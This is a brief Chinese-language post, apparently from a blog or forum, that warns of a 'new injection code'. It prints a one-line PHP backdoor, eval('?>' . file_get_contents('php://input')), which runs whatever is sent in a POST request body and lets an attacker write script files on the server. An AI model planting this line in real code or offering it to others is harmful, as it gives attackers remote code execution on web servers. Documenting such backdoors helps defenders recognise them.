发现一个新的注入 代码 eval 下面这句代码,就是一段恶意的代码,通过form POST 提交数据即可生成脚本文件。 eval('?>' . file_get_contents('php://input'));